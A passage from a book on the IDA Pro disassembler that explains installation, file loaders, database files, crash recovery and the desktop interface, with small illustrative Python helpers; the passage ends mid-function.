coverage of many tools and techniques useful to the binary reverse

engineer.

8. See http://www.hex-rays.com/idapro/idasupport.htm.

9. See http://www.binarypool.com/idapluginwriting/idapw.pdf.

The IDA Palace

Though it has had problems finding a permanent residence, the IDA

Palace¹⁰ is a website dedicated to hosting information on IDA-related

resources. Visitors can expect to find links to various papers related to

IDA usage along with scripts and plug-ins for extending IDA’s capabilities.

Ilfak’s blog

Finally, Ilfak’s blog¹¹ often contains postings detailing the use of IDA to

solve various problems ranging from general disassembly to debugging

and malware analysis. Additionally, postings by other Hex-Rays team

members often detail some of the latest IDA features, as well as features

that are under development.

Your IDA Installation

Once you calm down from the initial excitement of receiving your shiny, new

IDA CD and get down to the task of installing IDA, you will see that your CD

contains directories named utilities and sdk containing various add-on utilities

and the IDA software development kit, respectively. These will be discussed

in detail later in the book. In the root directory of the CD you will find an

installation binary. For Windows users, this binary is a traditional Windows

installer executable. For Linux and OS X users, the installation binary is a

gzipped .tar file.

Windows Installation

Installing IDA on Windows is very straightforward. IDA’s Windows installer

requires a password that is supplied with your CD or via email if you have

downloaded your copy of IDA. Launching the Windows installer walks

you through several informational dialogs, only one of which requires any

thought. As shown in Figure 3-1, you will be offered the opportunity to

specify an installation location or to accept the default suggested by the

installer. Regardless of whether you choose the default or specify an alter-

nate location, for the remainder of this book we will refer to your chosen

install location as <IDADIR>. In your IDA directory, you will find your key file,

ida.key, along with the following IDA executables:

• idag.exe is the Windows native GUI version of IDA. Beginning with version 6.2, this file will cease to be shipped with IDA.

• idaq.exe is the Windows Qt GUI version of IDA (versions 6.0 and later).

• idaw.exe is the Windows text-mode version of IDA.

10. See http://old.idapalace.net/.

11. See http://www.hexblog.com/.

Figure 3-1: Choosing your installation location

With the move to the Qt cross-platform GUI library in IDA version 6.0,

the native Windows version of IDA (idag.exe) has been deprecated and will

cease to ship with IDA beginning with version 6.2.

OS X and Linux Installation

For installation on either OS X or Linux, gunzip and untar the appropriate

archive to a location of your choosing. On a Linux system, it might look

like this:

# tar -xvzf ida61l.tgz

On an OS X system, it will look like this:

# tar -xvzf ida61m.tgz

In either case, you will have a top-level directory named ida that contains

all required files.

For both OS X and Linux, the name of the GUI version is idaq and the

name of the console version is idal. The appearance of the console version is

very similar to the Windows console version of IDA, which is shown in Fig-

ure 3-2. Linux users may need to verify (using ldd) that all shared libraries

required by IDA are available on their systems. One plug-in in particular,

IDAPython, expects to find Python version 2.6 installed. You may need to

upgrade your Python installation or create symbolic links as necessary to sat-

isfy IDA requirements.
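The ldd check can also be scripted. The sketch below is our own illustration rather than anything shipped with IDA: it runs ldd against a binary of your choosing and reports every library that ldd marks as "not found". The function names are hypothetical, and the script assumes ldd is on your path.

```python
import subprocess


def missing_libraries(ldd_output):
    """Return the library names that ldd reports as 'not found'."""
    missing = []
    for line in ldd_output.splitlines():
        if "=> not found" in line:
            # Lines look like "<tab>libname.so.N => not found"
            missing.append(line.split("=>")[0].strip())
    return missing


def check_binary(path):
    """Run ldd on path and return the list of unresolved libraries."""
    result = subprocess.run(["ldd", path], capture_output=True, text=True)
    return missing_libraries(result.stdout)
```

Calling check_binary on idaq, idal, or an individual plug-in returns an empty list when every dependency resolves.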

Figure 3-2: The console version of IDA Pro

IDA and SELinux

If you are a Linux user that has SELinux enabled, you may find that IDA

complains it “cannot enable executable stack as shared object” when attempt-

ing to load your desired processor module. The execstack command may be

used to fix this problem on a per-module basis, as shown here:

execstack -c <IDADIR>/procs/pc.ilx

32-bit vs. 64-bit IDA

Users of the advanced version of IDA will notice that they have two versions

of each IDA executable, such as idag.exe and idag64.exe or idaq and idaq64.

The distinction between the versions is that idax64 (where x is g, q, w, or l) is capable of disassembling

64-bit code; however, all of the IDA executables themselves are 32-bit

code. As a result, users running IDA on 64-bit platforms need to ensure that

any supporting software required by IDA is available in a 32-bit version. For

example, 64-bit Linux users must ensure that a 32-bit version of Python is

installed if they wish to use IDAPython for scripting. Consult the documenta-

tion for your operating system for details on mixing 32- and 64-bit software.
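If you are unsure whether a particular Python installation is a 32-bit or 64-bit build, the interpreter can tell you. This small sketch (the function name is ours) reports the pointer width of whichever interpreter runs it, so run it with the Python installation you expect IDA to use.

```python
import struct


def interpreter_bits():
    """Return the pointer width, in bits, of the running Python interpreter."""
    # "P" is the struct format code for a native pointer (void *)
    return struct.calcsize("P") * 8
```

A result of 32 indicates a build that a 32-bit IDA executable should be able to load; a result of 64 indicates one that it cannot.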

The IDA Directory Layout

Instant familiarity with the contents of your IDA installation is by no means

a requirement before you start using IDA. However, since our attention is

turned to your new IDA install for the moment, let’s take an initial look at

the basic layout. An understanding of the IDA directory structure will become

more important as you progress to using the more advanced features of IDA

covered later in the book. A brief description of each of the subdirectories

within the IDA installation follows (for Windows and Linux users, these

are found under <IDADIR>; for OS X users, these will be found under

<IDADIR>/idaq.app/Contents/MacOS):

cfg The cfg directory contains various configuration files, including the

basic IDA configuration file ida.cfg, the GUI configuration file idagui.cfg,

and the text-mode user interface configuration file idatui.cfg. Some of

the more useful configuration capabilities of IDA will be covered in

Chapter 11.

idc The idc directory contains the core files required by IDA’s built-in script-

ing language, IDC. Scripting with IDC will be covered in more detail in

Chapter 15.

ids The ids directory contains symbol files (IDS files in IDA parlance) that

describe the content of shared libraries that may be referenced by binaries

loaded into IDA. These IDS files contain summary information that lists

all entries that are exported from a given library. These entries describe

the type and number of parameters that a function requires, the return

type (if any) of a function, and the calling convention utilized by the

function.

loaders

The loaders directory contains IDA extensions that are used during the

file-loading process to recognize and parse known file formats such as PE

or ELF files. IDA loaders will be discussed in more detail in Chapter 18.

plugins

The plugins directory contains IDA modules designed to provide addi-

tional, and in most cases user-defined, behavior for IDA. IDA plug-ins

will be discussed in greater detail in Chapter 17.

procs

The procs directory contains the processor modules supported by the

installed version of IDA. Processor modules provide the machine-

language-to-assembly-language translation capability within IDA and are

responsible for generating the assembly language displayed in the IDA

user interface. IDA processor modules will be discussed in more detail

in Chapter 19.

sig The sig directory contains signatures for existing code that IDA utilizes

for various pattern-matching operations. It is through such pattern

matching that IDA can identify sequences of code as known library code,

potentially saving you significant amounts of time in the analysis process.

The signatures are generated using IDA’s Fast Library Identification and

Recognition Technology (FLIRT), which will be covered in more detail

in Chapter 12.

til The til directory contains type library information that IDA uses to record

the layout of data structures specific to various compiler libraries. Cus-

tomizing IDA type libraries will be discussed further in Chapter 13.
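As a quick sanity check on a new installation, the subdirectories just described can be verified with a few lines of code. This is a sketch under the assumption that your installation uses exactly the directory names listed above; the function name is our own, and the argument is your <IDADIR> (or the MacOS directory inside the application bundle on OS X).

```python
import os

# Subdirectory names taken from the list above
IDA_SUBDIRS = ["cfg", "idc", "ids", "loaders", "plugins", "procs", "sig", "til"]


def missing_subdirs(ida_dir):
    """Return the expected IDA subdirectories that are absent from ida_dir."""
    return [name for name in IDA_SUBDIRS
            if not os.path.isdir(os.path.join(ida_dir, name))]
```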

Thoughts on IDA’s User Interface

IDA’s MS-DOS heritage remains evident to this day. Regardless of the inter-

face (text or GUI) that you happen to be using, IDA makes extensive use

of hotkeys. While this is not necessarily a bad thing, it can yield unexpected

results if you believe that you are in a text-entry mode and find that nearly

every keystroke leads IDA to perform some hotkey action. For example, this

can happen while using the GUI if you position the cursor to make a change

and are expecting that anything you type will appear at the cursor location

(IDA is not your mother’s word processor).

From a data-entry perspective, IDA accepts virtually all of its input via

dialogs, so if you are attempting to enter any data at all into IDA, do make

sure you see a dialog in which to enter that data. The one exception is IDA’s

hex-editing feature, which is only available via the Hex View window.

A final point worth remembering is this: There is no undo in IDA! If you

inadvertently press a key that happens to initiate a hotkey action, do not

waste any time searching for an undo feature within IDA’s menu system—

you will not find one. Nor will you find a command history list to help you

determine what it was you just did.

Summary

With the mundane details out of the way, it is time to move on to using IDA

to accomplish something useful. Over the course of the next few chapters,

you will discover how to use IDA to perform basic file analysis, learn how to

interpret the IDA data displays, and learn how to manipulate those displays

to further your understanding of a program’s behavior.

PART II

BASIC IDA USAGE

GETTING STARTED WITH IDA

It’s about time we got down to actually

using IDA. The remainder of this book is

dedicated to various features of IDA and how

you can leverage them to best suit your reverse

engineering needs. In this chapter we begin by covering

the options you are presented with when you launch

IDA, and then we describe just what is happening when you open a binary

file for analysis. Finally, we’ll present a quick overview of the user interface to

lay the groundwork for the remaining chapters.

For the sake of standardization, examples in both this chapter and the

remainder of the book will be presented with the Windows Qt GUI interface

unless an example requires a specific, different version of IDA (such as an

example of Linux debugging).

Launching IDA

Any time you launch IDA, you will be greeted briefly by a splash screen

that displays a summary of your license information. Once the splash

screen clears, IDA displays another dialog offering three ways to proceed

to its desktop environment, as shown in Figure 4-1.

Figure 4-1: Launching IDA

If you prefer not to see the welcome message, feel free to uncheck the

Display at startup checkbox at the bottom of the dialog. If you uncheck the box,

future sessions will begin as if you had clicked the Go button, and you will

be taken directly to an empty IDA workspace. If at some point you find your-

self longing for the Welcome dialog (after all, it conveniently allows you to

return to recently used files), you will need to edit IDA’s registry key to set

the DisplayWelcome value back to 1. Alternatively, selecting Windows▸Reset

hidden messages will restore all previously hidden messages.

NOTE When installed on Windows, IDA creates the following registry key: HKEY_CURRENT_USER\

Software\Hex-Rays\IDA.¹ Many options that can be configured within IDA itself (as

opposed to editing one of the configuration files) are stored within this registry key.

However, on other platforms, IDA stores such values in a binary data file ($HOME/

.idapro/ida.reg) that is not easily edited.
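On Windows, the DisplayWelcome value can be inspected without opening the registry editor. The sketch below assumes that the value lives directly under the key named in the note; we have not confirmed its exact location or type for every IDA version, so treat both as assumptions. The function name is ours, and the winreg module is the Python 3 name (Python 2 calls it _winreg).

```python
import sys

# Key path taken from the note above, relative to HKEY_CURRENT_USER
IDA_KEY = r"Software\Hex-Rays\IDA"


def read_display_welcome():
    """Return the DisplayWelcome value, or None if it cannot be read."""
    if sys.platform != "win32":
        # Other platforms store these settings in $HOME/.idapro/ida.reg
        return None
    import winreg
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, IDA_KEY) as key:
            value, _value_type = winreg.QueryValueEx(key, "DisplayWelcome")
            return value
    except OSError:
        # Key or value is missing (assumed location may be wrong)
        return None
```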

Each of the three options shown in Figure 4-1 offers a slightly different

method to proceed to the IDA desktop. These three launch options are

reviewed here:

New Choosing New opens a standard File Open dialog to select the file to be

analyzed. Following file selection, one or more additional dialogs are dis-

played that allow you to choose specific file-analysis options before the

file is loaded, analyzed, and displayed.

1. Older versions of IDA used HKEY_CURRENT_USER\Software\Datarescue\IDA.

Go The Go button terminates the load process and causes IDA to open with

an empty workspace. At this point, if you want to open a file, you may

drag and drop a binary file onto your IDA desktop, or you may use one

of the options from the File menu to open a file. The File▸Open command

results in a File Open dialog, as described previously. By default,

IDA utilizes a known extensions filter to limit the view of the File dialog.

Make sure that you modify or clear the filter (such as choosing All Files)

so that the File dialog correctly displays the file you are interested in

opening.² When you open a file this way, IDA attempts to automatically

identify the selected file’s type; however, you should pay careful atten-

tion to the Loading dialog to see which loaders have been selected to

process the file.

Previous

You should utilize the Previous button when you wish to open one of the

files in the list of recent files that is directly below the Previous button.

The list of recently used files is populated with values from the History

subkey of IDA’s Windows registry key (or ida.reg on non-Windows plat-

forms). The maximum length of the history list is initially set to 10, but

this limit may be raised as high as 100 by editing the appropriate entry in

idagui.cfg or idatui.cfg (see Chapter 11). Utilizing the history list is the

most convenient option for resuming work on recently used database

files.

IDA File Loading

When choosing to open a new file using the File▸Open command, you will

be presented with the loading dialog shown in Figure 4-2. IDA generates a

list of potential file types and displays that list at the top of the dialog. This list

represents the IDA loaders that are best suited for dealing with the selected

file. The list is created by executing each of the file loaders in IDA’s loaders

directory in order to find any loaders³ that recognize the new file. Note that

in Figure 4-2, both the Windows PE loader (pe.ldw) and the MS-DOS EXE

loader (dos.ldw) claim to recognize the selected file. Readers familiar with

the PE file format will not be surprised by this, as the PE file format is an

extended form of the MS-DOS EXE file format. The last entry in the list,

Binary File, will always be present since it is IDA’s default for loading files

that it does not recognize, and this provides the lowest-level method for load-

ing any file. When offered the choice of several loaders, it is not a bad initial

strategy to simply accept the default selection unless you possess specific

information that contradicts IDA’s determination.
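To see why both loaders claim the same file, consider how each format is recognized. The following toy sketch is not IDA's loader code; it simply applies the well-known signature checks: an MS-DOS EXE begins with the bytes MZ, and a PE file is an MZ file whose 32-bit field at offset 0x3C points to the signature PE\0\0. The function name and the returned labels are our own.

```python
import struct


def recognized_formats(data):
    """Return, in preference order, the formats these toy checks would claim."""
    formats = []
    if data[:2] == b"MZ":
        formats.append("MS-DOS EXE")
        if len(data) >= 0x40:
            # e_lfanew: little-endian offset of the PE header, stored at 0x3C
            (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
            if data[pe_offset:pe_offset + 4] == b"PE\x00\x00":
                formats.insert(0, "PE")
    # The binary loader accepts anything, so it is always offered last
    formats.append("Binary File")
    return formats
```

Every valid PE file passes the MS-DOS check as well, which is why the list in the dialog contains both entries.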

2. On non-Windows systems, it is not uncommon for executable files to have no file extension

at all.

3. IDA loaders will be discussed further in Chapter 18.

Figure 4-2: The IDA Load a New File dialog

At times, Binary File will be the only entry that appears in the loader list.

In such cases, the implied message is that none of the loaders recognize the

chosen file. If you opt to continue the loading process, make sure that you

select the processor type in accordance with your understanding of the file

contents.

The Processor Type drop-down menu allows you to specify which pro-

cessor module (from IDA’s procs directory) should be used during the disa-

ssembly process. In most cases, IDA will choose the proper processor based

on information that it reads from the executable file’s headers. When IDA

can’t properly determine the processor type associated with the file being

opened, you will need to manually select a processor type before continuing

with the file-loading operation.

The Loading Segment and Loading Offset fields are active only when

the Binary File input format is chosen in conjunction with an x86 family

processor. Since the binary loader is unable to extract any memory layout

information, the segment and offset values entered here are combined to

form the base address for the loaded file content. Should you forget to specify

a base address during the initial loading process, the base address of the

IDA image can be modified at any time using the Edit▸Segments▸Rebase

Program command.
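The way the two fields combine can be sketched in one line, assuming that the Loading Segment value is a paragraph number in the x86 real-mode sense (that is, a unit of 16 bytes). That interpretation is our assumption, and the function name is hypothetical.

```python
def binary_base_address(loading_segment, loading_offset):
    """Combine a paragraph-based segment and an offset into a linear address."""
    # One paragraph is 16 bytes, so the segment is shifted left by 4 bits
    return (loading_segment << 4) + loading_offset
```

Under this assumption, a loading segment of 0x1000 with a loading offset of 0x100 places the first byte of the file at linear address 0x10100.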

The Kernel Options buttons let you configure the specific disassembly

analysis options that IDA will utilize to enhance the recursive-descent

process. In the overwhelming majority of cases, the default options provide

the best possible disassembly. The IDA help files provide additional informa-

tion on available kernel options.

The Processor Options button provides access to configuration options

that apply to the selected processor module. However, processor options are

not necessarily available for every processor module. Limited help is available

for processor options as these options are very highly dependent on the

selected processor module and the programming proficiency of the module’s

author.

The remaining Options checkboxes are used to gain finer control over

the file-loading process. Each of the options is described further in IDA’s

help file. The options are not applicable to all input file types, and in most

cases, you can rely on the default selections. Specific cases when you may

need to modify these options will be covered in Chapter 21.

Using the Binary File Loader

When you opt to utilize the binary loader, you need to be prepared to do more

than your usual share of the processing work. With no file header information

to guide the analysis process, it is up to you to step in and perform tasks that

more capable loaders often do automatically. Examples of situations that

may call for the use of the binary loader include the analysis of ROM images

and exploit payloads that may have been extracted from network packet

captures or log files.

When the x86 processor module is paired with the binary loader, the dia-

log shown in Figure 4-3 will be displayed. With no recognizable file headers

available to assist IDA, it is up to the user to specify whether code should be

treated as 16-bit or 32-bit mode code. Other processors for which IDA can

distinguish between 16- and 32-bit modes include ARM and MIPS.

Figure 4-3: x86 mode selection

Binary files contain no information concerning their memory layout

(at least no information that IDA knows how to recognize). When an x86

processor type has been selected, base address information must be specified

in the loader dialog’s Loading Segment and Loading Offset fields, as men-

tioned earlier. For all other processor types, IDA displays the memory layout

dialog shown in Figure 4-4. As a convenience, you may create a RAM section,

a ROM section, or both and designate the address range of each. The Input

File options are used to specify which portion of the input file (the default

is the entire file) should be loaded and to which address the file content

should be mapped.

Figure 4-4: The Memory Organization dialog

Figure 4-5 shows the last step of a binary load—a gentle reminder that

you need to do some work. The message highlights the fact that IDA has no

header information available to help it distinguish code bytes from data bytes

in the binary file. At this point, you are reminded to designate one of the

addresses in the file as an entry point by telling IDA to turn the byte(s) at

that address into code (C is the hotkey used to force IDA to treat a byte as

code). For binary files, IDA will not perform any initial disassembly until you

take the time to identify at least one byte as code.

Figure 4-5: Binary file loading

IDA Database Files

When you are happy with your loading options and click OK to close the

dialog, the real work of loading the file begins. At this point, IDA’s goal

is to load the selected executable file into memory and to analyze the

relevant portions. This results in the creation of an IDA database whose

components are stored in four files, each with a base name matching the

selected executable and whose extensions are .id0, .id1, .nam, and .til. The

.id0 file contains the content of a B-tree–style database, while the .id1 file

contains flags that describe each program byte. The .nam file contains index

information related to named program locations as displayed in IDA’s Names

window (discussed further in Chapter 5). Finally, the .til file is used to store

information concerning local type definitions specific to a given database.

The format of each of these files is proprietary to IDA, and the files are not

easily edited outside of the IDA environment.

For convenience, these four files are archived, and optionally compressed,

into a single IDB file whenever you close your current project. When people

refer to an IDA database, they are typically referring to the IDB file. An uncom-

pressed database file is usually 10 times the size of the original input binary

file. When the database is closed properly, you should never see files with

.id0, .id1, .nam, or .til extensions in your working directories. Their presence

often indicates that a database was not closed properly (for example, when

IDA crashes) and that the database may be corrupt.
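A working directory can be checked for such leftovers with a short script. This is a sketch of our own (the function name is hypothetical) that simply looks for the four component extensions named above. Note that these files are expected to exist while IDA has the database open, so the check is meaningful only when IDA is not running.

```python
import os

# Extensions of the four database component files
COMPONENT_EXTENSIONS = (".id0", ".id1", ".nam", ".til")


def leftover_components(directory):
    """Return the database component files found in directory, sorted by name."""
    found = []
    for name in sorted(os.listdir(directory)):
        if os.path.splitext(name)[1].lower() in COMPONENT_EXTENSIONS:
            found.append(name)
    return found
```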

It is important to understand that once a database has been created for

a given executable, IDA no longer requires access to that executable unless

you intend to use IDA’s integrated debugger to debug the executable itself.

From a security standpoint, this is a nice feature. For instance, when you are

analyzing a malware sample, you can pass the associated database among

analysts without passing along the malicious executable itself. There are no

known cases in which an IDA database has been used as an attack vector for

malicious software.

LOADER WARNINGS

Once a loader begins to analyze a file, it may encounter circumstances that require

additional user input in order to complete the loading process. One example of this

occurs with PE files that have been created with PDB debugging information. If IDA

determines that a Program Database (PDB) file may exist, you will be asked whether

you want IDA to locate and to process the corresponding PDB file as shown in this

message:

IDA Pro has determined that the input file was linked with debug

information. Do you want to look for the corresponding PDB file at

the local symbol store and the Microsoft Symbol Server?

A second example of a loader-generated informational message occurs with

obfuscated programs such as malware. Obfuscation techniques often play fast

and loose with file format specifications, which can cause problems for loaders

expecting well-structured files. Knowing this, the PE loader performs some validation

on import tables, and if the import tables do not seem to be formatted according to

convention, IDA will display the following message:

The imports segment seems to be destroyed. This MAY mean that the

file was packed or otherwise modified in order to make it more

difficult to analyze. If you want to see the imports segment in the

original form, please reload it with the ‘make imports section’

checkbox cleared.

Examples of this error and how to deal with it will be covered in Chapter 21.

At its heart, IDA is nothing more than a database application. New

databases are created and populated automatically from executable files.

The various displays that IDA offers are simply views into the database that

reveal information in a format useful to the software reverse engineer. Any

modifications that users make to the database are reflected in the views and

saved with the database, but these changes have no effect on the original

executable file. The power of IDA lies in the tools it contains to analyze and

manipulate the data within the database.

IDA Database Creation

Once you have chosen a file to analyze and specified your options, IDA ini-

tiates the creation of a database. For this process, IDA turns control over to

the selected loader module, whose job it is to load the file from disk, parse

any file-header information that it may recognize, create various program

sections containing either code or data as specified in the file’s headers, and,

finally, identify specific entry points into the code before returning control

to IDA. In this regard, IDA loader modules behave much as operating system

loaders behave. The IDA loader will determine a virtual memory layout

based on information contained in the program file headers and configure

the database accordingly.

Once the loader has finished, the disassembly engine within IDA takes

over and begins passing one address at a time to the selected processor

module. The processor module’s job is to determine the type of instruction

located at that address, the length of the instruction at that address, and the

location(s) at which execution can continue from that address (e.g., is the

current instruction sequential or branching?). When IDA is comfortable that

it has found all of the instructions in the file, it makes a second pass through

the list of instruction addresses and asks the processor module to generate the

assembly language version of each instruction for display.
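The division of labor just described can be illustrated with a toy model. The sketch below is emphatically not IDA's engine: the four-opcode instruction set, the decode function standing in for a processor module, and every name in it are invented for illustration. It does show the two passes, though: the first follows control flow to discover instruction addresses, and the second generates text for each discovered instruction.

```python
def decode(code, addr):
    """Toy 'processor module': return (text, length, successor addresses)."""
    opcode = code[addr]
    if opcode == 0x00:                       # nop: falls through
        return "nop", 1, [addr + 1]
    if opcode == 0x01:                       # jmp: one-byte absolute target
        return "jmp 0x%02x" % code[addr + 1], 2, [code[addr + 1]]
    if opcode == 0x02:                       # jz: falls through or branches
        return "jz 0x%02x" % code[addr + 1], 2, [addr + 2, code[addr + 1]]
    if opcode == 0xFF:                       # ret: no successors
        return "ret", 1, []
    raise ValueError("unknown opcode 0x%02x at 0x%02x" % (opcode, addr))


def disassemble(code, entry_point):
    """Return (address, text) pairs for every instruction reachable from entry_point."""
    # Pass 1: hand one address at a time to the decoder and queue its successors
    discovered = {}
    worklist = [entry_point]
    while worklist:
        addr = worklist.pop()
        if addr in discovered or not 0 <= addr < len(code):
            continue
        _text, length, successors = decode(code, addr)
        discovered[addr] = length
        worklist.extend(successors)
    # Pass 2: generate the display text for each discovered address, in order
    return [(addr, decode(code, addr)[0]) for addr in sorted(discovered)]
```

Given the bytes 00 02 05 01 06 00 FF 00 and an entry point of 0, the final byte is never reached by any control-flow path, so it is left undisassembled, just as unreachable bytes in a real binary are initially treated as data.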

Following this disassembly, IDA automatically conducts additional analysis

of the binary file to extract additional information likely to be useful to the

analyst. Users can expect to find some or all of the following information

incorporated into the database once IDA completes its initial analysis:

Compiler identification

It is often useful to know what compiler was used to build a piece of

software. Identifying the compiler that was used can help us understand

function-calling conventions used in a binary as well as determine what

libraries the binary may be linked with. When a file is loaded, IDA attempts

to identify the compiler that was used to create the input file. If the

compiler can be identified, the input file is scanned for sequences of

boilerplate code known to be used by that compiler. Such functions are

color coded in an effort to reduce the amount of code that needs to be

analyzed.

Function argument and local variable identification

Within each identified function (addresses that are targets of call

instructions), IDA performs a detailed analysis of the behavior of the

stack pointer register in order to both recognize accesses to variables

located within the stack and understand the layout of the function’s

stack frame.⁴ Names are automatically generated for such variables based

on their use as either local variables within the function or as arguments

passed into the function as part of the function call process.

Datatype information

Utilizing knowledge of common library functions and their required

parameters, IDA adds comments to the database to indicate the locations

at which parameters are passed into these functions. These comments

save the analyst a tremendous amount of time by providing information

that would otherwise need to be retrieved from various application pro-

gramming interface (API) references.

Closing IDA Databases

Any time you close a database, whether you are closing IDA altogether or

simply switching to a different database, you are presented with the Save

Database dialog, as shown in Figure 4-6.

Figure 4-6: The Save Database dialog

If this is the initial save of a newly created database, the new database file-

name is derived from the input filename by replacing the input extension

with the .idb extension (e.g., example.exe yields a database named example.idb).

When the input file has no extension, .idb is appended to form the name of

the database (e.g., httpd yields httpd.idb). The available save options and their

associated implications are summarized in the following list:

Don’t pack database

This option simply flushes changes to the four database component files

and closes the desktop without creating an IDB file. This option is not

recommended when closing your databases.

4. Stack frames are discussed further in Chapter 6.

Pack database (Store)

Selecting the Store option results in the four database component files

being archived into a single IDB file. Any previous IDB will be overwritten

without confirmation. No compression is used with the Store option.

Once the IDB file has been created, the four database component files

are deleted.

Pack database (Deflate)

The Deflate option is identical to the Store option, with the exception

that the database component files are compressed within the IDB

archive.

Collect garbage

Requesting garbage collection causes IDA to delete any unused memory

pages from the database prior to closing it. Select this option in conjunc-

tion with Deflate in order to create the smallest possible IDB file. This

option is not generally required unless disk space is at a premium.

DON’T SAVE the database

You may wonder why anyone would choose not to save his work. It turns

out that this option is the only way to discard changes that you have made

to a database since the last time it was saved. When this option is selected,

IDA simply deletes the four database component files and leaves any

existing IDB file untouched. Using this option is as close as you will get

to an undo or revert capability while using IDA.
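The database naming rule given before the list of save options is easy to express in code. This is a sketch of the rule as described, with a function name of our own choosing; how IDA treats unusual names, such as files with several extensions, is not something we have verified.

```python
import os


def default_database_name(input_path):
    """Replace the input file's extension with .idb, or append .idb if it has none."""
    base, _extension = os.path.splitext(input_path)
    return base + ".idb"
```

For the two examples given earlier, example.exe yields example.idb and httpd yields httpd.idb.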

Reopening a Database

Granted, reopening an existing database doesn’t involve rocket science,⁵ so

you may be wondering why this topic is covered at all. Under ordinary cir-

cumstances, returning to work on an existing database is as simple as select-

ing the database using one of IDA’s file-opening methods. Database files

open much faster the second (and subsequent) time around because there

is no analysis to perform. As an added bonus, IDA restores your IDA desktop

to the same state it was in at the time it was closed.

Now for the bad news. Believe it or not, IDA crashes on occasion. Whether

because of a bug in IDA itself or because of a bug in some bleeding-edge

plug-in you have installed, crashes leave open databases in a potentially cor-

rupt state. Once you restart IDA and attempt to reopen the affected data-

base, you are likely to see one of the dialogs shown in Figures 4-7 and 4-8.

Figure 4-7: Database Restore dialog

5. Unless you happen to be opening rocket_science.idb.

When IDA crashes, there is no opportunity for IDA to close the active

database, and the intermediate database files do not get deleted. If this was

not the first time that you were working with a particular database, you may

have a situation in which both an IDB file and potentially corrupt intermedi-

ate files are present at the same time. The IDB file represents the last-known

good state of the database, while the intermediate files contain any changes

that may have been made since the last save operation. In this case, you will

be offered the choice to revert to the saved version or resume use of the open,

potentially corrupt version, as shown in Figure 4-7. Choosing Continue with

Unpacked Base by no means guarantees that you will recover your work. The

unpacked database is probably in an inconsistent state, which will prompt

IDA to offer the dialog shown in Figure 4-8. In this case, IDA itself recom-

mends that you consider restoring from the packed data, so consider yourself

warned if you opt to go with a repaired database.

Figure 4-8: Database Repair dialog

When an active database has never been saved, thus leaving only inter-

mediate files present at the time of the crash, IDA offers the repair option in

Figure 4-8 as soon as you try to open the original executable file again.
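The two crash scenarios differ only in which files are left on disk, so it is possible to predict which dialog to expect before restarting IDA. The sketch below is a plain Python illustration rather than anything IDA provides. The function name expected_dialog and the return values are hypothetical, and the component-file extensions are again assumed to be .id0, .id1, .nam, and .til.

```python
import os
import tempfile

COMPONENT_EXTS = (".id0", ".id1", ".nam", ".til")  # assumed component-file extensions


def expected_dialog(directory, base):
    """Guess which recovery dialog to expect for database `base` in `directory`."""
    names = set(os.listdir(directory))
    has_idb = base + ".idb" in names
    has_components = any(base + ext in names for ext in COMPONENT_EXTS)
    if has_components and has_idb:
        return "restore"   # Figure 4-7: packed IDB plus unpacked leftovers
    if has_components:
        return "repair"    # Figure 4-8: leftovers only, database never saved
    return "none"          # clean state, nothing to recover


# Simulate a crash during a session on a previously saved database.
with tempfile.TemporaryDirectory() as workdir:
    for name in ("httpd.idb", "httpd.id0", "httpd.id1", "httpd.nam", "httpd.til"):
        open(os.path.join(workdir, name), "w").close()
    print(expected_dialog(workdir, "httpd"))   # restore
```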

Introduction to the IDA Desktop

Given the amount of time you are likely to spend staring at your IDA desktop,

you will want to spend some time familiarizing yourself with its various compo-

nents. Figure 4-9 shows an overview of a default IDA desktop. The behavior

of the desktop during file analysis is discussed in the following section.

Areas of interest in this introductory view include the following:

1. The toolbar area ➊ contains tools corresponding to the most commonly

used IDA operations. Toolbars are added to and removed from the

desktop using the View ▸ Toolbars command. Using drag-and-drop, you

can reposition each of the toolbars to suit your needs. Figure 4-9 shows

IDA’s basic mode toolbar with a single row of tool buttons. An advanced

mode toolbar is available using View ▸ Toolbars ▸ Advanced mode. The

Advanced mode toolbars contain three full rows of tool buttons.

Figure 4-9: The IDA desktop

2. The horizontal color band is IDA’s overview navigator ➋, also called the

navigation band. The navigation band presents a linear view of the address

space of the loaded file. By default, the entire address range of the binary

is represented. You can zoom in and out of the address range by right-

clicking anywhere within the navigation band and selecting one of the

available zoom options. Different colors represent different types of file

content, such as data or code. A small current position indicator (yellow by

default) points at the navigation band address that corresponds to the

current address range being displayed in the disassembly window. Hover-

ing the mouse cursor over any portion of the navigation band yields a tool

tip that describes that location in the binary. Clicking the navigation band

jumps the disassembly view to the selected location within the binary. The

colors used in the navigation band can be customized using the Options ▸

Colors command. Dragging the navigation band away from the IDA

desktop yields a detached Overview Navigator, as shown in Figure 4-10.

Also shown in Figure 4-10 is the current position indicator (the

half-length, downward-facing arrow to the left of location ➊) and a color key

identifying the file content by functional groups.

Figure 4-10: The Overview Navigator

3. Coming back to Figure 4-9, tabs ➌ are provided for each of the currently

open data displays. Data displays contain information extracted from the

binary and represent the various views into the database. The majority

of your analysis work is likely to take place through interaction with the

available data displays. Figure 4-9 shows three of the available data

displays: IDA-View, Functions, and Graph Overview. Additional data

displays are available via the View ▸ Open Subviews menu, and this menu

is also used to restore any displays that have been closed, whether on

purpose or inadvertently.

4. The disassembly view ➍ is the primary data display. Two display styles are

available for the disassembly view: graph view (default) and listing view.

In graph view, IDA displays a flowchart-style graph of a single function at

any given time. When this is combined with the graph overview, you can

gain an understanding of the flow of the function using a visual break-

down of the function’s structure. When the IDA-View window is active,

the spacebar toggles between graph view–style and listing-style displays.

If you wish to make listing view your default, you must uncheck Use

graph view by default on the Graph tab via the Options ▸ General menu,

as shown in Figure 4-11.

Figure 4-11: IDA graph options

5. In graph view, it is seldom possible to fit the entire graph of a function

into the display area at one time. The graph overview ➎, present only

when graph view is active, provides a zoomed-out snapshot of the basic

graph structure. A dotted rectangle indicates the current display within

the graph view. Clicking within the graph overview repositions the graph

view accordingly.

6. The Output window ➏ is where you can expect to find any informational

messages generated by IDA. Here you will find status messages concern-

ing the progress of the file-analysis phase, along with any error mes-

sages resulting from user-requested operations. The Output window

roughly equates to a console output device.

7. The Functions window ➐ rounds out the default IDA display windows

and will be discussed further in Chapter 5.
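The navigation band described in item 2 is a linear mapping between addresses and horizontal positions. A minimal Python sketch of that idea follows. It makes no claim about how IDA draws the band: the function names are hypothetical, the 800-pixel width is arbitrary, and the address range is simply chosen to be a round number for the example.

```python
def band_column(address, start, end, width):
    """Map `address` in [start, end) to a pixel column in a band `width` pixels wide."""
    if not start <= address < end:
        raise ValueError("address outside the displayed range")
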